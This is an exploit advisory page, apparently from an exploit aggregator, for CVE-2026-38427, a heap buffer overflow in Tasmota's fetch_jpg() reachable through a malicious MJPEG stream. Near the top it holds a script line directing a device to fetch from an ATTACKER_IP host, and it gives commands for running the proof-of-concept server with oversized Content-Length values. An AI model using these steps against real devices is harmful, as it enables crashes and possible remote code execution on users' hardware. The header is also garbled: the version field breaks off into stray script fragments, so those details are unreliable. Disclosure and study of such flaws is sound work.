Share
## https://sploitus.com/exploit?id=F03A36CE-08F4-59DF-B4D9-99156AEA0C10
# CVE-2026-38427: Integer Wraparound โ Heap Buffer Overflow in Tasmota fetch_jpg()
**CVE:** CVE-2026-38427
**Severity:** Critical (CVSS 9.8)
**Product:** Arendst Tasmota
**Affected Version:** D
>B
fetchjp(ATTACKER_IP:PORT/stream,0,0,1)
>1
=fetchjp(2,0,0,1)
```
---
## Proof of Concept
The PoC runs a fake MJPEG HTTP server that sends frames with malicious `Content-Length` values:
```python
python3 CVE-2026-38427_poc.py --port 8889 --cl 65537
python3 CVE-2026-38427_poc.py --port 8889 --cl 131072
```
See [CVE-2026-38427_poc.py](CVE-2026-38427_poc.py) for full implementation.
---
## Impact
- **Confidentiality:** High (RCE possible on ESP32)
- **Integrity:** High
- **Availability:** High (guaranteed crash/reboot)
- **Attack Vector:** Network
- **Authentication:** None required (device must be scripted to connect to attacker server)
---
## Timeline
- **2026-03-29:** Vulnerability discovered and reported to MITRE
- **2026-03-29:** CVE-2026-38427 assigned
- **2026-05-xx:** Patch released by Tasmota (v15.3.0.4+)
---
## References
- [Tasmota GitHub](https://github.com/arendst/Tasmota)
- [xdrv_10_scripter.ino](https://github.com/arendst/Tasmota/blob/development/tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino)
- CVE-2026-38427